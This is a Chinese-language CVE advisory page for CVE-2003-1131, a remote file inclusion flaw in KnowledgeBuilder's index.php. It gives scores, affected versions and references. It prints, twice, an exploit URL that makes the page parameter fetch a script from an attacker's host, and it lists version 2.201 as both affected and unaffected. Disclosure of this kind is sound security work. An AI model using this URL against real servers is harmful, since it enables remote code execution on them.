CVE-2003-1131
CVSS7.5
发布时间 :2003-12-31 00:00:00
修订时间 :2016-10-17 22:39:25
NMCOES    

[原文]PHP remote file inclusion vulnerability in index.php in KnowledgeBuilder, referred to as KnowledgeBase, allows remote attackers to execute arbitrary PHP code by modifying the page parameter to reference a URL on a remote web server that contains the code.


[CNNVD]KnowledgeBuilder远程文件包含漏洞(CNNVD-200312-403)

        KnowledgeBuilder(也称为KnowledgeBase)中的index.php存在PHP远程文件包含漏洞。远程攻击者可以通过修改page参数引用远程web服务器上包含代码的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:activecampaign:knowledgebuilder:2.0.1
cpe:/a:activecampaign:knowledgebuilder:2.1.0
cpe:/a:activecampaign:knowledgebuilder:3.0.1
cpe:/a:activecampaign:knowledgebuilder:2.1.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1131
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1131
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-403
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111066494323543&w=2
(UNKNOWN)  BUGTRAQ  20050312 KnowledgeBase
http://www.securityfocus.com/archive/1/348359
(UNKNOWN)  BUGTRAQ  20031224 Remote Code Execution in Knowledge Builder.
http://www.securityfocus.com/bid/9292
(PATCH)  BID  9292
http://xforce.iss.net/xforce/xfdb/14078
(UNKNOWN)  XF  knowledgebuilder-indexphp-file-include(14078)

- 漏洞信息

KnowledgeBuilder远程文件包含漏洞
高危 未知
2003-12-31 00:00:00 2006-09-28 00:00:00
远程  
        KnowledgeBuilder(也称为KnowledgeBase)中的index.php存在PHP远程文件包含漏洞。远程攻击者可以通过修改page参数引用远程web服务器上包含代码的URL执行任意PHP代码。

- 公告与补丁

        The vendor has released a patch to address this issue. Users are advised to contact the vendor for further details regarding obtaining and applying a relevant patch.

- 漏洞信息 (23476)

KnowledgeBuilder 2.0/2.1/3.0 Remote File Include Vulnerability (EDBID:23476)
php webapps
2003-12-24 Verified
0 Zero X
N/A [点击下载]
source: http://www.securityfocus.com/bid/9292/info

KnowledgeBuilder is prone to a remote file include vulnerability. An attacker could exploit this to cause hostile PHP scripts to be included and executed from a remote server. This would occur in the security context of the web server hosting the software. 

http://www.example.com/kb/index.php?page=http://[attacker's_host]/[attacker's_script] 		

- 漏洞信息

3228
ActiveCampaign KnowledgeBuilder index.php page Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

KnowledgeBuilder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to index.php not properly sanitizing user input supplied to the 'page' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2003-12-24 Unknow
2003-12-24 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, ActiveCampaign has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

KnowledgeBuilder Remote File Include Vulnerability
Unknown 9292
Yes No
2003-12-24 12:00:00 2009-07-12 12:56:00
Discovery of this issue is credited to Zero_X www.lobnan.de Team <zero-x@linuxmail.org>.

- 受影响的程序版本

ActiveCampaign KnowledgeBuilder 3.0 01
ActiveCampaign KnowledgeBuilder 2.1 04
ActiveCampaign KnowledgeBuilder 2.1 00
ActiveCampaign KnowledgeBuilder 2.0 01
ActiveCampaign KnowledgeBuilder 2.201

- 不受影响的程序版本

ActiveCampaign KnowledgeBuilder 2.201

- 漏洞讨论

KnowledgeBuilder is prone to a remote file include vulnerability. An attacker could exploit this to cause hostile PHP scripts to be included and executed from a remote server. This would occur in the security context of the web server hosting the software.

- 漏洞利用

This issue may be exploited with the following example:

http://www.example.com/kb/index.php?page=http://[attacker's_host]/[attacker's_script]

- 解决方案

The vendor has released a patch to address this issue. Users are advised to contact the vendor for further details regarding obtaining and applying a relevant patch.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站